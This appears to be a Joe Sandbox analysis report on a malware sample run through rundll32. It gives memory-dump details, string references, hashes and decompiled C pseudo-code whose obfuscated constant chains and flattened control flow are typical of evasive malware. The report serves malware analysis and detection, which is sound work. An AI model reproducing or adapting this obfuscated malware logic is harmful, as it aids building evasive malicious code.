0x00000000
0x00000000
0x001b0f6b
0x001b0f6b
0x001b0f6b
0x001b0f73
0x001b0f76
0x00000000
0x001b0e25
0x001b0e2b
0x001b0ecc
0x001b0ed5
0x001b0edd
0x001b0ee3
0x001b0f3a
0x001b0f53
0x001b0f56
0x001b0f5b
0x001b1057
0x001b1059
0x001b105e
0x001b0e31
0x001b0e31
0x001b0e37
0x001b0e3d
0x001b0e46
0x001b0ea1
0x001b0eba
0x001b0ebf
0x001b0ec2
0x001b0df1
0x001b0df1
0x001b0df3
0x001b0df4
0x00000000
0x001b0df4
0x001b0df1
0x001b0e37
0x001b0e2b
0x001b0e1f
0x001b0e13
0x00000000
0x001b0e07
0x001b104e
0x001b1055
0x00000000
0x001b105f
0x001b105f
0x001b105f
0x001b1078
0x001b1078

Strings

B, xrefs: 001B0B7E
v|, xrefs: 001B08FB
#u, xrefs: 001B0A5C
.Y^, xrefs: 001B0A09
`, xrefs: 001B0DB6
p, xrefs: 001B0A21
9, xrefs: 001B0ABF
*, xrefs: 001B0AF1
], xrefs: 001B0BA2
R, xrefs: 001B0C48
W:, xrefs: 001B0A75
]t, xrefs: 001B0A8A
ar-KW, xrefs: 001B0E81, 001B0E8B, 001B0F63
M., xrefs: 001B0DA0
DiK, xrefs: 001B0868
}?, xrefs: 001B06ED
2-, xrefs: 001B0CDD
4s, xrefs: 001B0906
), xrefs: 001B0B4E
X2, xrefs: 001B077E
:N, xrefs: 001B0C3D
B?, xrefs: 001B0AE9

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #u$)$*$.Y^$2-$4s$:N$B?$M.$W:$X2$]t$]$`$ar-KW$v|$}?$9$B$DiK$R$p
API String ID: 0-1481457001
Opcode ID: 80f20bf7604ab0ddc6909a1eb9c1526c1d9be77f79860637a66e979aca659d60
Instruction ID: e9d57303b770785e560cf24af323c5540e5b33d710904461eb4b91ca2f3710d0
Opcode Fuzzy Hash: 80f20bf7604ab0ddc6909a1eb9c1526c1d9be77f79860637a66e979aca659d60
Instruction Fuzzy Hash: 2C32137150C381DFE368CF25C98AA9BBBE2FBC5354F10891DE299862A0D7B58548CF03

Uniqueness

Uniqueness Score: -1.00%

Function 001C1600, Relevance: 26.8, Strings: 21, Instructions: 524
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E001C1600(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				unsigned int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				unsigned int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _t565;
				signed int _t566;
				signed int _t571;
				signed int _t576;
				signed int _t586;
				signed int _t587;
				signed int _t590;
				signed int _t594;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				void* _t622;
				signed int _t663;
				signed int _t664;
				void* _t665;
				signed int _t671;
				signed int _t675;
				signed int* _t676;
				signed int* _t677;
				void* _t679;

				_t676 =  &_v1820;
				_v1752 = 0xe7dc;
				_v1752 = _v1752 | 0xbbb084f7;
				_v1752 = _v1752 >> 3;
				_v1752 = _v1752 ^ 0x17761cd6;
				_v1784 = 0xa401;
				_v1592 = __edx;
				_t665 = 0x1fe88934;
				_v1588 = __ecx;
				_t599 = 0x52;
				_v1784 = _v1784 / _t599;
				_t663 = 0x7e;
				_v1784 = _v1784 * 0x35;
				_v1784 = _v1784 << 0x10;
				_v1784 = _v1784 ^ 0x6a006efb;
				_v1816 = 0xa6d9;
				_v1816 = _v1816 >> 0xd;
				_v1816 = _v1816 >> 7;
				_v1816 = _v1816 << 0xf;
				_v1816 = _v1816 ^ 0x000035d9;
				_v1648 = 0x817b;
				_v1648 = _v1648 + 0x19d6;
				_v1648 = _v1648 ^ 0x0000fac3;
				_v1728 = 0x8791;
				_v1728 = _v1728 / _t663;
				_v1728 = _v1728 | 0x1309302b;
				_v1728 = _v1728 ^ 0x1309792c;
				_v1772 = 0x36a;
				_v1772 = _v1772 | 0xa00da548;
				_v1772 = _v1772 << 2;
				_v1772 = _v1772 >> 0xe;
				_v1772 = _v1772 ^ 0x000246f9;
				_v1656 = 0xe02f;
				_v1656 = _v1656 ^ 0xffef37a8;
				_v1656 = _v1656 ^ 0xffef8eaa;
				_v1624 = 0xca82;
				_v1624 = _v1624 * 0x74;
				_v1624 = _v1624 ^ 0x005b891a;
				_v1704 = 0xcd20;
				_v1704 = _v1704 + 0x5ce3;
				_v1704 = _v1704 ^ 0xb9506522;
				_v1704 = _v1704 ^ 0xb9513418;
				_v1712 = 0x786f;
				_v1712 = _v1712 >> 4;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 ^ 0x00002dd4;
				_v1632 = 0x3393;
				_v1632 = _v1632 ^ 0xb3f8477c;
				_v1632 = _v1632 ^ 0xb3f808a6;
				_v1640 = 0x4661;
				_v1640 = _v1640 | 0xdca56c92;
				_v1640 = _v1640 ^ 0xdca57894;
				_v1760 = 0xb4c5;
				_v1760 = _v1760 + 0xfba0;
				_v1760 = _v1760 + 0xfffff0ce;
				_v1760 = _v1760 + 0x1afe;
				_v1760 = _v1760 ^ 0x0001fbda;
				_v1792 = 0xa1e6;
				_v1792 = _v1792 * 0x31;
				_v1792 = _v1792 >> 0xb;
				_v1792 = _v1792 ^ 0x90b63b30;
				_v1792 = _v1792 ^ 0x90b62b06;
				_v1604 = 0x7889;
				_v1604 = _v1604 * 0xb;
				_v1604 = _v1604 ^ 0x00054f7c;
				_v1628 = 0x3fdb;
				_t600 = 0x4b;
				_v1628 = _v1628 * 0x1d;
				_v1628 = _v1628 ^ 0x000773c4;
				_v1716 = 0x189;
				_v1716 = _v1716 / _t600;
				_t601 = 5;
				_v1716 = _v1716 / _t601;
				_v1716 = _v1716 ^ 0x000047cb;
				_v1596 = 0x2e18;
				_v1596 = _v1596 | 0x2c58be74;
				_v1596 = _v1596 ^ 0x2c589b5e;
				_v1788 = 0x4316;
				_v1788 = _v1788 + 0x3f21;
				_v1788 = _v1788 + 0xa67d;
				_v1788 = _v1788 << 6;
				_v1788 = _v1788 ^ 0x004a1749;
				_v1796 = 0x2b72;
				_v1796 = _v1796 | 0xfe4a2b44;
				_v1796 = _v1796 + 0xffffe9f4;
				_v1796 = _v1796 << 8;
				_v1796 = _v1796 ^ 0x4a150c1f;
				_v1620 = 0xc0cd;
				_v1620 = _v1620 | 0x6355bc39;
				_v1620 = _v1620 ^ 0x63558c47;
				_v1812 = 0xa54f;
				_t602 = 0x66;
				_v1812 = _v1812 / _t602;
				_v1812 = _v1812 ^ 0xe3d47b10;
				_t603 = 0x3c;
				_v1812 = _v1812 / _t603;
				_v1812 = _v1812 ^ 0x03cc2f31;
				_v1820 = 0xe85e;
				_v1820 = _v1820 << 0xa;
				_v1820 = _v1820 | 0x7333ec65;
				_v1820 = _v1820 + 0xd912;
				_v1820 = _v1820 ^ 0x73b4d777;
				_v1748 = 0x3968;
				_v1748 = _v1748 + 0xffff42a9;
				_t604 = 0x3b;
				_v1748 = _v1748 / _t604;
				_v1748 = _v1748 ^ 0x0456da67;
				_v1692 = 0x663d;
				_v1692 = _v1692 | 0x673b8cb8;
				_v1692 = _v1692 ^ 0x2c73d09f;
				_v1692 = _v1692 ^ 0x4b486906;
				_v1756 = 0x4483;
				_v1756 = _v1756 >> 5;
				_v1756 = _v1756 + 0xffff32d5;
				_v1756 = _v1756 * 0x55;
				_v1756 = _v1756 ^ 0xffbcd36a;
				_v1764 = 0xd87f;
				_v1764 = _v1764 + 0x6f1e;
				_v1764 = _v1764 >> 0xb;
				_v1764 = _v1764 | 0xe19bb8b0;
				_v1764 = _v1764 ^ 0xe19ba680;
				_v1688 = 0x41a5;
				_v1688 = _v1688 + 0xffff6a05;
				_v1688 = _v1688 | 0x0d9398e2;
				_v1688 = _v1688 ^ 0xffff9c26;
				_v1696 = 0x28b9;
				_v1696 = _v1696 + 0xffffa230;
				_t605 = 0x35;
				_v1696 = _v1696 / _t605;
				_v1696 = _v1696 ^ 0x04d4c260;
				_v1740 = 0xd6b8;
				_v1740 = _v1740 | 0x5e67bbca;
				_t606 = 0x62;
				_v1740 = _v1740 * 0x3f;
				_v1740 = _v1740 ^ 0x3b979153;
				_v1668 = 0x7192;
				_v1668 = _v1668 ^ 0x5e0b1623;
				_v1668 = _v1668 ^ 0x5e0b6329;
				_v1808 = 0xfcfa;
				_v1808 = _v1808 + 0x2c0b;
				_v1808 = _v1808 >> 1;
				_v1808 = _v1808 / _t606;
				_v1808 = _v1808 ^ 0x0000123b;
				_v1800 = 0xba7;
				_t607 = 0x27;
				_v1800 = _v1800 / _t607;
				_v1800 = _v1800 + 0x499a;
				_v1800 = _v1800 >> 7;
				_v1800 = _v1800 ^ 0x00007b82;
				_v1612 = 0xf3de;
				_t608 = 0x26;
				_v1612 = _v1612 * 0x2d;
				_v1612 = _v1612 ^ 0x002aa131;
				_v1652 = 0xd5f3;
				_v1652 = _v1652 * 0x2f;
				_v1652 = _v1652 ^ 0x00276626;
				_v1732 = 0x1c56;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 >> 0xe;
				_v1732 = _v1732 ^ 0x00005f9f;
				_v1768 = 0x675e;
				_v1768 = _v1768 + 0xaaeb;
				_v1768 = _v1768 | 0x5a2c931b;
				_v1768 = _v1768 >> 0xc;
				_v1768 = _v1768 ^ 0x0005c353;
				_v1676 = 0x98ad;
				_v1676 = _v1676 << 0xe;
				_v1676 = _v1676 >> 2;
				_v1676 = _v1676 ^ 0x098ac652;
				_v1700 = 0xe8e6;
				_v1700 = _v1700 | 0x6297e1e5;
				_v1700 = _v1700 / _t663;
				_v1700 = _v1700 ^ 0x00c831a9;
				_v1644 = 0x5d13;
				_v1644 = _v1644 >> 0xa;
				_v1644 = _v1644 ^ 0x00003f75;
				_v1776 = 0x22f0;
				_v1776 = _v1776 + 0xffffc716;
				_v1776 = _v1776 / _t608;
				_v1776 = _v1776 ^ 0x921f2e1a;
				_v1776 = _v1776 ^ 0x94a3d653;
				_v1684 = 0xb332;
				_v1684 = _v1684 << 2;
				_v1684 = _v1684 ^ 0x3ee23675;
				_v1684 = _v1684 ^ 0x3ee0fe79;
				_v1616 = 0x7d58;
				_v1616 = _v1616 + 0x2481;
				_v1616 = _v1616 ^ 0x0000ce01;
				_v1636 = 0xec75;
				_v1636 = _v1636 + 0xffffed94;
				_v1636 = _v1636 ^ 0x00008c85;
				_v1724 = 0xbbe1;
				_v1724 = _v1724 ^ 0xbdf582d3;
				_v1724 = _v1724 | 0x0f2583dd;
				_v1724 = _v1724 ^ 0xbff5d489;
				_v1600 = 0xf9c8;
				_v1600 = _v1600 + 0x1098;
				_v1600 = _v1600 ^ 0x00010927;
				_v1608 = 0x8d6c;
				_v1608 = _v1608 + 0x34ef;
				_v1608 = _v1608 ^ 0x0000d631;
				_v1720 = 0xec4f;
				_v1720 = _v1720 << 9;
				_v1720 = _v1720 + 0xa8b0;
				_v1720 = _v1720 ^ 0x01d93672;
				_v1708 = 0x897f;
				_v1708 = _v1708 >> 1;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 ^ 0x000041f1;
				_v1660 = 0x70e;
				_v1660 = _v1660 + 0x6979;
				_v1660 = _v1660 ^ 0x00004427;
				_v1736 = 0x9f84;
				_v1736 = _v1736 + 0xffff2000;
				_t609 = 0x63;
				_v1736 = _v1736 / _t609;
				_v1736 = _v1736 ^ 0x0295f945;
				_v1744 = 0x2eb;
				_v1744 = _v1744 | 0x65acc451;
				_v1744 = _v1744 + 0xffffd674;
				_v1744 = _v1744 ^ 0x65acceba;
				_v1780 = 0xfb55;
				_v1780 = _v1780 | 0xd7ffbfef;
				_v1780 = _v1780 ^ 0xd7ffaaa1;
				_v1664 = 0x93d7;
				_v1664 = _v1664 << 7;
				_v1664 = _v1664 ^ 0x0049b1a5;
				_v1672 = 0x5132;
				_v1672 = _v1672 + 0xffff4f79;
				_v1672 = _v1672 << 0xd;
				_v1672 = _v1672 ^ 0xf4151874;
				_v1680 = 0xe508;
				_v1680 = _v1680 * 3;
				_v1680 = _v1680 >> 6;
				_v1680 = _v1680 ^ 0x00005453;
				_v1804 = 0x841;
				_v1804 = _v1804 ^ 0xac5a4353;
				_v1804 = _v1804 ^ 0xf24c9b87;
				_v1804 = _v1804 + 0x4b6d;
				_v1804 = _v1804 ^ 0x5e071c02;
				_t565 = L001D672F();
				_t597 = _v1592;
				_t675 = _t565;
				_t664 = _v1592;
				goto L1;
				do {
					while(1) {
						L1:
						_t679 = _t665 - 0x1a3ed785;
						if(_t679 > 0) {
							goto L16;
						}
						L2:
						if(_t679 == 0) {
							_push(_v1600);
							_push(_v1724);
							_push(0);
							_push(_v1636);
							_push( &_v1044);
							_push(_v1616);
							_push(0);
							_push(1);
							L001D4DAD(_v1684, __eflags);
							_t676 =  &(_t676[8]);
							_t665 = 0x11228dd5;
							continue;
						} else {
							if(_t665 == 0xb0836f) {
								_push(_v1808);
								_push(_v1668);
								L001CEF2E(L001C6ABA(_v1740, 0x1df170, __eflags), __eflags, _v1612, _v1652,  &_v1564, _v1732, 0x104,  &_v1044, _v1768,  &_v524, _t597, _v1676);
								_t609 = _v1700;
								L001CF935(_t609, _t579, _v1644, _v1776);
								_t676 =  &(_t676[0xe]);
								_t665 = 0x1a3ed785;
								continue;
							} else {
								if(_t665 == 0xc5b3fc) {
									_t586 = L001C2746(_v1588, _v1592, 0x1df1b0,  &_v1564);
									asm("sbb esi, esi");
									_pop(_t609);
									_t671 =  ~_t586 & 0x2310c76b;
									__eflags = _t671;
									L13:
									_t665 = _t671 + 0x16833e65;
									continue;
								} else {
									if(_t665 == 0xdfccd50) {
										_t587 = L001CEF80(_v1708, _v1584, _v1660);
										_pop(_t609);
										_t665 = 0x3313aee3;
										continue;
									} else {
										if(_t665 == 0x11228dd5) {
											_t587 = L001CEF80(_v1608, _t597, _v1720);
											_pop(_t609);
											_t665 = 0xdfccd50;
											while(1) {
												L1:
												_t679 = _t665 - 0x1a3ed785;
												if(_t679 > 0) {
													goto L16;
												}
												goto L2;
											}
											goto L16;
										} else {
											if(_t665 == 0x16833e65) {
												return L001CEF80(_v1672, _t664, _v1680);
											}
											if(_t665 == 0x19094c99) {
												 *((intOrPtr*)(_t664 + 0x1c)) = _v1588;
												_t590 =  *0x1e0718;
												 *(_t664 + 8) = _t590;
												 *0x1e0718 = _t664;
												return _t590;
											}
											break;
										}
									}
								}
							}
						}
						L17:
						__eflags = _t665 - 0x1fe88934;
						if(_t665 != 0x1fe88934) {
							__eflags = _t665 - 0x3313aee3;
							if(_t665 == 0x3313aee3) {
								_t609 = _v1736;
								L001D0DE5(_t609, _v1780, _v1576, _v1664);
								_t676 =  &(_t676[3]);
								_t665 = 0x19094c99;
								continue;
							} else {
								__eflags = _t665 - 0x36990c61;
								if(_t665 == 0x36990c61) {
									_t576 = L001D2513( &_v1576, _v1748,  &_v1584, _v1692);
									asm("sbb esi, esi");
									_pop(_t609);
									_t665 = ( ~_t576 & 0xeca92f85) + 0x3313aee3;
									continue;
								} else {
									__eflags = _t665 - 0x399405d0;
									if(_t665 != 0x399405d0) {
										break;
									} else {
										_v1572 = L001DCEE5();
										_t594 = L001CC7EA(_v1604, _v1628, _t593, _v1716);
										_pop(_t622);
										_v1568 = 2 + _t594 * 2;
										_t609 = _t675;
										_t587 = L001D1128(_t609, _v1596, _v1788, _v1796, _v1620, _t622, _v1804, _v1812, _t675,  &_v1576, _t675, _v1820);
										_t676 =  &(_t676[0xb]);
										asm("sbb esi, esi");
										_t671 =  ~_t587 & 0x2015cdfc;
										goto L13;
									}
								}
							}
							L32:
							return _t571;
						}
						_push(_t609);
						_push(_t609);
						_t571 = L001D9E2B(0x38);
						_t664 = _t571;
						_t677 =  &(_t676[3]);
						__eflags = _t664;
						if(_t664 != 0) {
							_push(_t609);
							L001D29A0(_v1704, _v1712, _v1632,  &_v524, _v1640, _t609, _v1752);
							_t676 =  &(_t677[8]);
							_t665 = 0xc5b3fc;
							continue;
						}
						goto L32;
						L16:
						__eflags = _t665 - 0x1fbcde68;
						if(_t665 == 0x1fbcde68) {
							_t609 = _v1756;
							_t566 = L001CF099(_t609, _v1764, _v1584, _v1688, _v1580, _v1696);
							_t597 = _t566;
							_t676 =  &(_t676[4]);
							__eflags = _t566;
							if(__eflags == 0) {
								_t665 = 0xdfccd50;
								break;
							} else {
								_t665 = 0xb0836f;
								continue;
							}
							goto L32;
						}
						goto L17;
					}
					__eflags = _t665 - 0x1385e7c1;
				} while (__eflags != 0);
				return _t587;
			}

0x001c1600
0x001c1606
0x001c160e
0x001c1616
0x001c161b
0x001c1623
0x001c1633
0x001c163a
0x001c1643
0x001c164a
0x001c164f
0x001c165a
0x001c165b
0x001c165f
0x001c1664
0x001c166c
0x001c1674
0x001c1679
0x001c167e
0x001c1683
0x001c168b
0x001c1696
0x001c16a1
0x001c16ac
0x001c16ba
0x001c16be
0x001c16c6
0x001c16ce
0x001c16d6
0x001c16de
0x001c16e3
0x001c16e8
0x001c16f0
0x001c16fb
0x001c1706
0x001c1711
0x001c1724
0x001c172b
0x001c1736
0x001c1741
0x001c174c
0x001c1757
0x001c1762
0x001c176a
0x001c176f
0x001c1774
0x001c177c
0x001c1787
0x001c1792
0x001c179d
0x001c17a8
0x001c17b3
0x001c17be
0x001c17c6
0x001c17ce
0x001c17d6
0x001c17de
0x001c17e6
0x001c17f3
0x001c17f7
0x001c17fc
0x001c1804
0x001c180c
0x001c181f
0x001c1826
0x001c1831
0x001c1848
0x001c184b
0x001c1852
0x001c185d
0x001c186d
0x001c1875
0x001c187a
0x001c1880
0x001c1888
0x001c1893
0x001c189e
0x001c18a9
0x001c18b1
0x001c18b9
0x001c18c1
0x001c18c6
0x001c18ce
0x001c18d6
0x001c18de
0x001c18e6
0x001c18eb
0x001c18f3
0x001c18fe
0x001c1909
0x001c1914
0x001c1920
0x001c1925
0x001c192b
0x001c1937
0x001c193c
0x001c1942
0x001c194a
0x001c1952
0x001c1957
0x001c195f
0x001c1967
0x001c196f
0x001c1977
0x001c1983
0x001c1986
0x001c198a
0x001c1992
0x001c199d
0x001c19a8
0x001c19b3
0x001c19be
0x001c19c6
0x001c19cb
0x001c19d8
0x001c19dc
0x001c19e4
0x001c19ec
0x001c19f4
0x001c19f9
0x001c1a01
0x001c1a09
0x001c1a14
0x001c1a1f
0x001c1a2a
0x001c1a35
0x001c1a42
0x001c1a56
0x001c1a5b
0x001c1a62
0x001c1a6d
0x001c1a75
0x001c1a84
0x001c1a87
0x001c1a8b
0x001c1a93
0x001c1a9e
0x001c1aa9
0x001c1ab4
0x001c1abc
0x001c1ac4
0x001c1ad0
0x001c1ad4
0x001c1adc
0x001c1ae8
0x001c1aed
0x001c1af1
0x001c1af9
0x001c1afe
0x001c1b06
0x001c1b1b
0x001c1b1c
0x001c1b23
0x001c1b2e
0x001c1b41
0x001c1b48
0x001c1b53
0x001c1b5b
0x001c1b5f
0x001c1b64
0x001c1b6c
0x001c1b74
0x001c1b7c
0x001c1b84
0x001c1b89
0x001c1b91
0x001c1b9c
0x001c1ba4
0x001c1bac
0x001c1bb7
0x001c1bc2
0x001c1bd8
0x001c1bdf
0x001c1bea
0x001c1bf5
0x001c1bfd
0x001c1c08
0x001c1c10
0x001c1c1e
0x001c1c22
0x001c1c2a
0x001c1c32
0x001c1c3d
0x001c1c45
0x001c1c50
0x001c1c5d
0x001c1c68
0x001c1c73
0x001c1c7e
0x001c1c89
0x001c1c94
0x001c1c9f
0x001c1ca7
0x001c1caf
0x001c1cb7
0x001c1cbf
0x001c1cca
0x001c1cd5
0x001c1ce0
0x001c1ceb
0x001c1cf6
0x001c1d01
0x001c1d09
0x001c1d0e
0x001c1d16
0x001c1d1e
0x001c1d29
0x001c1d30
0x001c1d38
0x001c1d43
0x001c1d4e
0x001c1d59
0x001c1d64
0x001c1d6c
0x001c1d7a
0x001c1d7d
0x001c1d81
0x001c1d89
0x001c1d91
0x001c1d99
0x001c1da1
0x001c1da9
0x001c1db1
0x001c1db9
0x001c1dc1
0x001c1dcc
0x001c1dd4
0x001c1ddf
0x001c1dea
0x001c1df5
0x001c1dfd
0x001c1e08
0x001c1e1b
0x001c1e22
0x001c1e2a
0x001c1e35
0x001c1e3d
0x001c1e45
0x001c1e4d
0x001c1e55
0x001c1e65
0x001c1e6a
0x001c1e71
0x001c1e73
0x001c1e73
0x001c1e7a
0x001c1e7a
0x001c1e7a
0x001c1e7a
0x001c1e80
0x00000000
0x00000000
0x001c1e86
0x001c1e86
0x001c1fee
0x001c1ffc
0x001c2000
0x001c2002
0x001c2009
0x001c200a
0x001c2018
0x001c201a
0x001c201c
0x001c2021
0x001c2024
0x00000000
0x001c1e8c
0x001c1e92
0x001c1f64
0x001c1f6d
0x001c1fc3
0x001c1fd5
0x001c1fdc
0x001c1fe1
0x001c1fe4
0x00000000
0x001c1e98
0x001c1e9e
0x001c1f46
0x001c1f50
0x001c1f52
0x001c1f53
0x001c1f53
0x001c1f59
0x001c1f59
0x00000000
0x001c1ea4
0x001c1eaa
0x001c1f1b
0x001c1f20
0x001c1f21
0x00000000
0x001c1eac
0x001c1eb2
0x001c1ef6
0x001c1efb
0x001c1efc
0x001c1e7a
0x001c1e7a
0x001c1e7a
0x001c1e80
0x00000000
0x00000000
0x00000000
0x001c1e80
0x00000000
0x001c1eb4
0x001c1eba
0x00000000
0x001c2225
0x001c1ec6
0x001c1ed3
0x001c1ed6
0x001c1edb
0x001c1ede
0x00000000
0x001c1ede
0x00000000
0x001c1ec6
0x001c1eb2
0x001c1eaa
0x001c1e9e
0x001c1e92
0x001c203a
0x001c203a
0x001c2040
0x001c2046
0x001c204c
0x001c213c
0x001c2140
0x001c2145
0x001c2148
0x00000000
0x001c2052
0x001c2052
0x001c2058
0x001c2108
0x001c2112
0x001c211a
0x001c211b
0x00000000
0x001c205e
0x001c205e
0x001c2064
0x00000000
0x001c206a
0x001c208a
0x001c2091
0x001c2097
0x001c20a4
0x001c20c4
0x001c20d5
0x001c20da
0x001c20e1
0x001c20e3
0x00000000
0x001c20e3
0x001c2064
0x001c2058
0x001c2230
0x001c2230
0x001c2230
0x001c2168
0x001c2169
0x001c216c
0x001c2171
0x001c2173
0x001c2176
0x001c2178
0x001c217e
0x001c21af
0x001c21b4
0x001c21b7
0x00000000
0x001c21b7
0x00000000
0x001c202e
0x001c202e
0x001c2034
0x001c21e1
0x001c21e5
0x001c21ea
0x001c21ec
0x001c21ef
0x001c21f1
0x001c21fd
0x00000000
0x001c21f3
0x001c21f3
0x00000000
0x001c21f3
0x00000000
0x001c21f1
0x00000000
0x001c2034
0x001c2202
0x001c2202
0x00000000

Strings

!?, xrefs: 001C18B1
r+, xrefs: 001C18CE
u?, xrefs: 001C1BFD
2Q, xrefs: 001C1DDF
ox, xrefs: 001C1762
4, xrefs: 001C1CEB
/, xrefs: 001C16F0
O, xrefs: 001C1D01
u6>, xrefs: 001C1C45
^g, xrefs: 001C1B6C
h9, xrefs: 001C196F
'D, xrefs: 001C1D59
X}, xrefs: 001C1C5D
u, xrefs: 001C1C7E
ST, xrefs: 001C1E2A
\, xrefs: 001C1741
e3s, xrefs: 001C1957
=f, xrefs: 001C1992
mK, xrefs: 001C1E4D
aF, xrefs: 001C179D
&f', xrefs: 001C1B48

Memory Dump Source

Source File: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseFolderHandlePath
String ID: !?$&f'$'D$/$2Q$=f$O$ST$X}$^g$aF$e3s$h9$mK$ox$r+$u6>$u?$u$4$\
API String ID: 1943059022-1927376683
Opcode ID: f05a0a3134e04ea601a2722fac538cce236639b6576f5473410dd209f9c7f5a5
Instruction ID: 87252b8b7666e12b1679c39bf5100e500b400d37a13757d21b42c8bed265eb2d
Opcode Fuzzy Hash: f05a0a3134e04ea601a2722fac538cce236639b6576f5473410dd209f9c7f5a5
Instruction Fuzzy Hash: 68523F715083819FE378CF25C54AB8BBBE1BBD5708F00891DE5DA962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B9BE4, Relevance: 25.4, Strings: 20, Instructions: 419
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001B9BE4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				void* _t399;
				intOrPtr _t432;
				void* _t442;
				signed int _t445;
				intOrPtr _t457;
				signed int _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				intOrPtr _t469;
				void* _t500;
				intOrPtr* _t508;
				signed int _t511;
				intOrPtr _t516;
				signed int* _t518;
				void* _t520;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t399);
				_v184 = 0x32ca;
				_t518 =  &(( &_v184)[5]);
				_v184 = _v184 + 0xe38a;
				_t457 = 0;
				_t511 = 0x24c7bb9b;
				_t516 = 0;
				_t459 = 9;
				_v184 = _v184 * 0x76;
				_v184 = _v184 | 0x4ce8adb3;
				_v184 = _v184 ^ 0x4ce8e35f;
				_v128 = 0xb34b;
				_v128 = _v128 << 0x10;
				_v128 = _v128 ^ 0xa267c348;
				_v128 = _v128 + 0xcff7;
				_v128 = _v128 ^ 0x112dc3d2;
				_v96 = 0x561;
				_v96 = _v96 / _t459;
				_v96 = _v96 + 0xffff0fdd;
				_v96 = _v96 ^ 0xffff49d0;
				_v100 = 0x463d;
				_v100 = _v100 + 0xffff7752;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xff7b7eaa;
				_v104 = 0xd1d2;
				_t460 = 0x7f;
				_v104 = _v104 / _t460;
				_t461 = 0x1a;
				_v104 = _v104 / _t461;
				_v104 = _v104 ^ 0x00003d68;
				_v168 = 0xe22d;
				_v168 = _v168 + 0x5cc4;
				_v168 = _v168 + 0x1ca6;
				_v168 = _v168 + 0x9ffc;
				_v168 = _v168 ^ 0x0001c172;
				_v60 = 0xd358;
				_v60 = _v60 * 0x17;
				_v60 = _v60 ^ 0x0012fede;
				_v20 = 0x682;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x00004d41;
				_v84 = 0x5803;
				_v84 = _v84 + 0xffffb822;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x00003080;
				_v120 = 0xb23e;
				_v120 = _v120 << 3;
				_v120 = _v120 >> 0x10;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x000024a4;
				_v160 = 0x3bc3;
				_v160 = _v160 << 1;
				_v160 = _v160 + 0xffffa101;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x0000492a;
				_v32 = 0x287c;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x00004507;
				_v16 = 0xafee;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x002bf9ef;
				_v136 = 0xc764;
				_v136 = _v136 + 0xffff1fc0;
